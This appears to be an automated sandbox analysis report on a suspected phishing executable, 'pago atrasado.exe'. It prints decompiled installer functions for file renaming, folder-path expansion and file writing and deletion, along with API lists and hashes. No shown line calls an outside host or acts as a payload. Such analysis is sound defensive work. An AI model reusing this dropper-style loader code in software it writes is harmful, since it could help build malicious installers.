                                            						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)(_t18 + 0x128)));
                                            						_t20 = E0040586F(0x422140, 0xc0000000, 4);
                                            						_t53 = _t20;
                                            						 *(_t56 + 0x14) = _t53;
                                            						if(_t53 == 0xffffffff) {
                                            							goto L16;
                                            						}
                                            						_t47 = GetFileSize(_t53, 0);
                                            						_t7 = _t43 + 0xa; // 0xa
                                            						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                            						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                            							L15:
                                            							_t20 = CloseHandle(_t53);
                                            							goto L16;
                                            						} else {
                                            							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
                                            								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
                                            								if(_t28 == 0) {
                                            									L13:
                                            									_t29 = _t47;
                                            									L14:
                                            									E00405830(_t51 + _t29, 0x421d40, _t43);
                                            									SetFilePointer(_t53, 0, 0, 0);
                                            									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                            									GlobalFree(_t51);
                                            									goto L15;
                                            								}
                                            								_t37 = _t28 + 1;
                                            								_t44 = _t51 + _t47;
                                            								_t54 = _t37;
                                            								if(_t37 >= _t44) {
                                            									L21:
                                            									_t53 =  *(_t56 + 0x14);
                                            									_t29 = _t37 - _t51;
                                            									goto L14;
                                            								} else {
                                            									goto L20;
                                            								}
                                            								do {
                                            									L20:
                                            									 *((char*)(_t43 + _t54)) =  *_t54;
                                            									_t54 = _t54 + 1;
                                            								} while (_t54 < _t44);
                                            								goto L21;
                                            							}
                                            							E00405B98(_t51 + _t47, "[Rename]\r\n");
                                            							_t47 = _t47 + 0xa;
                                            							goto L13;
                                            						}
                                            					}
                                            				} else {
                                            					CloseHandle(E0040586F(_t49, 0, 1));
                                            					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
                                            					if(_t16 != 0 && _t16 <= 0x400) {
                                            						goto L5;
                                            					}
                                            				}
                                            				return _t16;
                                            			}

                                            APIs
                                              • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                              • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,0040567B,?,00000000,000000F1,?), ref: 00405933
                                            • GetShortPathNameA.KERNEL32 ref: 0040593C
                                            • GetShortPathNameA.KERNEL32 ref: 00405959
                                            • wsprintfA.USER32 ref: 00405977
                                            • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059D7
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A2F
                                            • GlobalFree.KERNEL32 ref: 00405A36
                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A3D
                                              • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                              • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                            • String ID: %s=%s$@!B$[Rename]
                                            • API String ID: 3445103937-2946522640
                                            • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                            • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                            • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                            • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                            				signed int _v8;
                                            				struct _ITEMIDLIST* _v12;
                                            				signed int _v16;
                                            				signed char _v20;
                                            				signed int _v24;
                                            				signed char _v28;
                                            				signed int _t36;
                                            				CHAR* _t37;
                                            				signed int _t39;
                                            				int _t40;
                                            				char _t50;
                                            				char _t51;
                                            				char _t53;
                                            				char _t55;
                                            				void* _t63;
                                            				signed int _t69;
                                            				intOrPtr _t73;
                                            				signed int _t74;
                                            				signed int _t75;
                                            				intOrPtr _t79;
                                            				char _t83;
                                            				void* _t85;
                                            				CHAR* _t86;
                                            				void* _t88;
                                            				signed int _t95;
                                            				signed int _t97;
                                            				void* _t98;
                                            
                                            				_t88 = __esi;
                                            				_t85 = __edi;
                                            				_t63 = __ebx;
                                            				_t36 = _a8;
                                            				if(_t36 < 0) {
                                            					_t79 =  *0x42371c; // 0x666dd3
                                            					_t36 =  *(_t79 - 4 + _t36 * 4);
                                            				}
                                            				_t73 =  *0x423f78; // 0x6656e0
                                            				_t74 = _t73 + _t36;
                                            				_t37 = 0x422ee0;
                                            				_push(_t63);
                                            				_push(_t88);
                                            				_push(_t85);
                                            				_t86 = 0x422ee0;
                                            				if(_a4 - 0x422ee0 < 0x800) {
                                            					_t86 = _a4;
                                            					_a4 = _a4 & 0x00000000;
                                            				}
                                            				while(1) {
                                            					_t83 =  *_t74;
                                            					if(_t83 == 0) {
                                            						break;
                                            					}
                                            					__eflags = _t86 - _t37 - 0x400;
                                            					if(_t86 - _t37 >= 0x400) {
                                            						break;
                                            					}
                                            					_t74 = _t74 + 1;
                                            					__eflags = _t83 - 0xfc;
                                            					_a8 = _t74;
                                            					if(__eflags <= 0) {
                                            						if(__eflags != 0) {
                                            							 *_t86 = _t83;
                                            							_t86 =  &(_t86[1]);
                                            							__eflags = _t86;
                                            						} else {
                                            							 *_t86 =  *_t74;
                                            							_t86 =  &(_t86[1]);
                                            							_t74 = _t74 + 1;
                                            						}
                                            						continue;
                                            					}
                                            					_t39 =  *(_t74 + 1);
                                            					_t75 =  *_t74;
                                            					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
                                            					_a8 = _a8 + 2;
                                            					_v28 = _t75 | 0x00000080;
                                            					_t69 = _t75;
                                            					_v24 = _t69;
                                            					__eflags = _t83 - 0xfe;
                                            					_v20 = _t39 | 0x00000080;
                                            					_v16 = _t39;
                                            					if(_t83 != 0xfe) {
                                            						__eflags = _t83 - 0xfd;
                                            						if(_t83 != 0xfd) {
                                            							__eflags = _t83 - 0xff;
                                            							if(_t83 == 0xff) {
                                            								__eflags = (_t39 | 0xffffffff) - _t95;
                                            								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
                                            							}
                                            							L41:
                                            							_t40 = lstrlenA(_t86);
                                            							_t74 = _a8;
                                            							_t86 =  &(_t86[_t40]);
                                            							_t37 = 0x422ee0;
                                            							continue;
                                            						}
                                            						__eflags = _t95 - 0x1d;
                                            						if(_t95 != 0x1d) {
                                            							__eflags = (_t95 << 0xa) + 0x425000;
                                            							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
                                            						} else {
                                            							E00405AF6(_t86,  *0x423f48);
                                            						}
                                            						__eflags = _t95 + 0xffffffeb - 7;
                                            						if(_t95 + 0xffffffeb < 7) {
                                            							L32:
                                            							E00405DFA(_t86);
                                            						}
                                            						goto L41;
                                            					}
                                            					_t97 = 2;
                                            					_t50 = GetVersion();
                                            					__eflags = _t50;
                                            					if(_t50 >= 0) {
                                            						L12:
                                            						_v8 = 1;
                                            						L13:
                                            						__eflags =  *0x423fc4;
                                            						if( *0x423fc4 != 0) {
                                            							_t97 = 4;
                                            						}
                                            						__eflags = _t69;
                                            						if(_t69 >= 0) {
                                            							__eflags = _t69 - 0x25;
                                            							if(_t69 != 0x25) {
                                            								__eflags = _t69 - 0x24;
                                            								if(_t69 == 0x24) {
                                            									GetWindowsDirectoryA(_t86, 0x400);
                                            									_t97 = 0;
                                            								}
                                            								while(1) {
                                            									__eflags = _t97;
                                            									if(_t97 == 0) {
                                            										goto L29;
                                            									}
                                            									_t51 =  *0x423f44; // 0x74261340
                                            									_t97 = _t97 - 1;
                                            									__eflags = _t51;
                                            									if(_t51 == 0) {
                                            										L25:
                                            										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
                                            										__eflags = _t53;
                                            										if(_t53 != 0) {
                                            											L27:
                                            											 *_t86 =  *_t86 & 0x00000000;
                                            											__eflags =  *_t86;
                                            											continue;
                                            										}
                                            										__imp__SHGetPathFromIDListA(_v12, _t86);
                                            										__imp__CoTaskMemFree(_v12);
                                            										__eflags = _t53;
                                            										if(_t53 != 0) {
                                            											goto L29;
                                            										}
                                            										goto L27;
                                            									}
                                            									__eflags = _v8;
                                            									if(_v8 == 0) {
                                            										goto L25;
                                            									}
                                            									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
                                            									__eflags = _t55;
                                            									if(_t55 == 0) {
                                            										goto L29;
                                            									}
                                            									goto L25;
                                            								}
                                            								goto L29;
                                            							}
                                            							GetSystemDirectoryA(_t86, 0x400);
                                            							goto L29;
                                            						} else {
                                            							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
                                            							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
                                            							__eflags =  *_t86;
                                            							if( *_t86 != 0) {
                                            								L30:
                                            								__eflags = _v16 - 0x1a;
                                            								if(_v16 == 0x1a) {
                                            									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                            								}
                                            								goto L32;
                                            							}
                                            							E00405BBA(_t72, _t86, _t97, _t86, _v16);
                                            							L29:
                                            							__eflags =  *_t86;
                                            							if( *_t86 == 0) {
                                            								goto L32;
                                            							}
                                            							goto L30;
                                            						}
                                            					}
                                            					__eflags = _t50 - 0x5a04;
                                            					if(_t50 == 0x5a04) {
                                            						goto L12;
                                            					}
                                            					__eflags = _v16 - 0x23;
                                            					if(_v16 == 0x23) {
                                            						goto L12;
                                            					}
                                            					__eflags = _v16 - 0x2e;
                                            					if(_v16 == 0x2e) {
                                            						goto L12;
                                            					} else {
                                            						_v8 = _v8 & 0x00000000;
                                            						goto L13;
                                            					}
                                            				}
                                            				 *_t86 =  *_t86 & 0x00000000;
                                            				if(_a4 == 0) {
                                            					return _t37;
                                            				}
                                            				return E00405B98(_a4, _t37);
                                            			}

                                            0x00405d5b
                                            0x00405d5f
                                            0x00405d67
                                            0x00405d67
                                            0x00000000
                                            0x00405d5f
                                            0x00405cc8
                                            0x00405d56
                                            0x00405d56
                                            0x00405d59
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405d59
                                            0x00405c99
                                            0x00405c6c
                                            0x00405c70
                                            0x00000000
                                            0x00000000
                                            0x00405c72
                                            0x00405c76
                                            0x00000000
                                            0x00000000
                                            0x00405c78
                                            0x00405c7c
                                            0x00000000
                                            0x00405c7e
                                            0x00405c7e
                                            0x00000000
                                            0x00405c7e
                                            0x00405c7c
                                            0x00405de1
                                            0x00405deb
                                            0x00405df7
                                            0x00405df7
                                            0x00000000

                                            APIs
                                            • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                            • GetSystemDirectoryA.KERNEL32 ref: 00405CDD
                                            • GetWindowsDirectoryA.KERNEL32(cuwawvnlx,00000400), ref: 00405CF0
                                            • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                            • SHGetPathFromIDListA.SHELL32(0040F0E0,cuwawvnlx), ref: 00405D3A
                                            • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                            • lstrcatA.KERNEL32(cuwawvnlx,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                            • lstrlenA.KERNEL32(cuwawvnlx,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$cuwawvnlx
                                            • API String ID: 900638850-2371621835
                                            • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                            • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                            • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                            • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CreateErrorFileLast$CloseHandle
                                            • String ID:
                                            • API String ID: 3924142190-0
                                            • Opcode ID: a3f0ac7604f3a7c51a52708cf5db40be82665f8cc9abde664eaed597f5aa6f52
                                            • Instruction ID: 8888709ac1b3f990a25a7769e21d0d637b6beb4763b8573e383d9fe45ee70f20
                                            • Opcode Fuzzy Hash: a3f0ac7604f3a7c51a52708cf5db40be82665f8cc9abde664eaed597f5aa6f52
                                            • Instruction Fuzzy Hash: A271B4B4904359CFEB00DFA8C58879EBBF4FB48354F10892AE855A7384D7759A44CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID: W$decode failure: data corruption or bug.$z
                                            • API String ID: 0-3221231465
                                            • Opcode ID: a7d240e89eb60e92831f35ab80898345cb7366ee939d29a2f2fc4bdf1b1aca2b
                                            • Instruction ID: 802b19b310518d7462d5cf6b4c3dcf35393c441b6e37b90adf612b12b8719041
                                            • Opcode Fuzzy Hash: a7d240e89eb60e92831f35ab80898345cb7366ee939d29a2f2fc4bdf1b1aca2b
                                            • Instruction Fuzzy Hash: 16F1A174E0520ACFEB14DF98C585A9EBBF1FF48394F218429E849A7354D734A981CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405DFA(CHAR* _a4) {
                                            				char _t5;
                                            				char _t7;
                                            				char* _t15;
                                            				char* _t16;
                                            				CHAR* _t17;
                                            
                                            				_t17 = _a4;
                                            				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                            					_t17 =  &(_t17[4]);
                                            				}
                                            				if( *_t17 != 0 && E004056F8(_t17) != 0) {
                                            					_t17 =  &(_t17[2]);
                                            				}
                                            				_t5 =  *_t17;
                                            				_t15 = _t17;
                                            				_t16 = _t17;
                                            				if(_t5 != 0) {
                                            					do {
                                            						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
                                            							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
                                            							_t16 = CharNextA(_t16);
                                            						}
                                            						_t17 = CharNextA(_t17);
                                            						_t5 =  *_t17;
                                            					} while (_t5 != 0);
                                            				}
                                            				 *_t16 =  *_t16 & 0x00000000;
                                            				while(1) {
                                            					_t16 = CharPrevA(_t15, _t16);
                                            					_t7 =  *_t16;
                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                            						break;
                                            					}
                                            					 *_t16 =  *_t16 & 0x00000000;
                                            					if(_t15 < _t16) {
                                            						continue;
                                            					}
                                            					break;
                                            				}
                                            				return _t7;
                                            			}









                                            APIs
                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\pago atrasado.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\pago atrasado.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                            • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-2752564856
                                            • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                            • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                            • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                            • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                            				struct tagLOGBRUSH _v16;
                                            				long _t35;
                                            				long _t37;
                                            				void* _t40;
                                            				long* _t49;
                                            
                                            				if(_a4 + 0xfffffecd > 5) {
                                            					L15:
                                            					return 0;
                                            				}
                                            				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                            				if(_t49 == 0) {
                                            					goto L15;
                                            				}
                                            				_t35 =  *_t49;
                                            				if((_t49[5] & 0x00000002) != 0) {
                                            					_t35 = GetSysColor(_t35);
                                            				}
                                            				if((_t49[5] & 0x00000001) != 0) {
                                            					SetTextColor(_a8, _t35);
                                            				}
                                            				SetBkMode(_a8, _t49[4]);
                                            				_t37 = _t49[1];
                                            				_v16.lbColor = _t37;
                                            				if((_t49[5] & 0x00000008) != 0) {
                                            					_t37 = GetSysColor(_t37);
                                            					_v16.lbColor = _t37;
                                            				}
                                            				if((_t49[5] & 0x00000004) != 0) {
                                            					SetBkColor(_a8, _t37);
                                            				}
                                            				if((_t49[5] & 0x00000010) != 0) {
                                            					_v16.lbStyle = _t49[2];
                                            					_t40 = _t49[3];
                                            					if(_t40 != 0) {
                                            						DeleteObject(_t40);
                                            					}
                                            					_t49[3] = CreateBrushIndirect( &_v16);
                                            				}
                                            				return _t49[3];
                                            			}









                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                            • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                            • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                            • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E004026AF(struct _OVERLAPPED* __ebx) {
                                            				void* _t27;
                                            				long _t32;
                                            				struct _OVERLAPPED* _t47;
                                            				void* _t51;
                                            				void* _t53;
                                            				void* _t56;
                                            				void* _t57;
                                            				void* _t58;
                                            
                                            				_t47 = __ebx;
                                            				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
                                            				_t52 = E00402A29(0xfffffff0);
                                            				 *(_t58 - 0x38) = _t24;
                                            				if(E004056F8(_t52) == 0) {
                                            					E00402A29(0xffffffed);
                                            				}
                                            				E00405850(_t52);
                                            				_t27 = E0040586F(_t52, 0x40000000, 2);
                                            				 *(_t58 + 8) = _t27;
                                            				if(_t27 != 0xffffffff) {
                                            					_t32 =  *0x423f54; // 0x8200
                                            					 *(_t58 - 0x30) = _t32;
                                            					_t51 = GlobalAlloc(0x40, _t32);
                                            					if(_t51 != _t47) {
                                            						E004030B3(_t47);
                                            						E00403081(_t51,  *(_t58 - 0x30));
                                            						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
                                            						 *(_t58 - 0x34) = _t56;
                                            						if(_t56 != _t47) {
                                            							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
                                            							while( *_t56 != _t47) {
                                            								_t49 =  *_t56;
                                            								_t57 = _t56 + 8;
                                            								 *(_t58 - 0x48) =  *_t56;
                                            								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                            								_t56 = _t57 +  *(_t58 - 0x48);
                                            							}
                                            							GlobalFree( *(_t58 - 0x34));
                                            						}
                                            						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
                                            						GlobalFree(_t51);
                                            						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                            					}
                                            					CloseHandle( *(_t58 + 8));
                                            				}
                                            				_t53 = 0xfffffff3;
                                            				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
                                            					_t53 = 0xffffffef;
                                            					DeleteFileA( *(_t58 - 0x38));
                                            					 *((intOrPtr*)(_t58 - 4)) = 1;
                                            				}
                                            				_push(_t53);
                                            				E00401423();
                                            				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
                                            				return 0;
                                            			}












                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                            • GlobalFree.KERNEL32 ref: 00402758
                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                            • GlobalFree.KERNEL32 ref: 00402771
                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                            • String ID:
                                            • API String ID: 3294113728-0
                                            • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                            • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                            • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                            • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00404E84(CHAR* _a4, CHAR* _a8) {
                                            				struct HWND__* _v8;
                                            				signed int _v12;
                                            				CHAR* _v32;
                                            				long _v44;
                                            				int _v48;
                                            				void* _v52;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				CHAR* _t26;
                                            				signed int _t27;
                                            				CHAR* _t28;
                                            				long _t29;
                                            				signed int _t39;
                                            
                                            				_t26 =  *0x423724; // 0x0
                                            				_v8 = _t26;
                                            				if(_t26 != 0) {
                                            					_t27 =  *0x423ff4; // 0x0
                                            					_v12 = _t27;
                                            					_t39 = _t27 & 0x00000001;
                                            					if(_t39 == 0) {
                                            						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
                                            					}
                                            					_t26 = lstrlenA(0x41fd10);
                                            					_a4 = _t26;
                                            					if(_a8 == 0) {
                                            						L6:
                                            						if((_v12 & 0x00000004) == 0) {
                                            							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
                                            						}
                                            						if((_v12 & 0x00000002) == 0) {
                                            							_v32 = 0x41fd10;
                                            							_v52 = 1;
                                            							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                            							_v44 = 0;
                                            							_v48 = _t29 - _t39;
                                            							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                            							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                            						}
                                            						if(_t39 != 0) {
                                            							_t28 = _a4;
                                            							 *((char*)(_t28 + 0x41fd10)) = 0;
                                            							return _t28;
                                            						}
                                            					} else {
                                            						_t26 =  &(_a4[lstrlenA(_a8)]);
                                            						if(_t26 < 0x800) {
                                            							_t26 = lstrcatA(0x41fd10, _a8);
                                            							goto L6;
                                            						}
                                            					}
                                            				}
                                            				return _t26;
                                            			}


















                                            APIs
                                            • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
